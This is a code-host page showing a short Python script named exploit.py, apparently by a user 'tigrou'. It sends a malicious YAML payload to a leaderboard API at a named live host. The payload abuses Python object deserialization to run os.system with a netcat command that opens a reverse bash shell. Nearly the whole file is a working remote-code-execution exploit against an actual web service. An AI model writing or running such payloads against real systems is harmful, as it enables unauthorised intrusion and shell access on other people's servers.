Files
tigrou/exploit.py
2025-12-14 19:52:49 +01:00

13 lines
342 B
Python

import requests
malicious_yaml = """
!!python/object/apply:os.system ["nc -e /bin/bash 127.0.0.1 1111"]
"""
#url = "http://127.0.0.1:8080/api/leaderboard"
url = "http://libremon.furtest.fr/api/leaderboard"
headers = {
"Content-Type": "text/yaml"
}
response = requests.post(url, headers=headers, data=malicious_yaml)
print(response.text)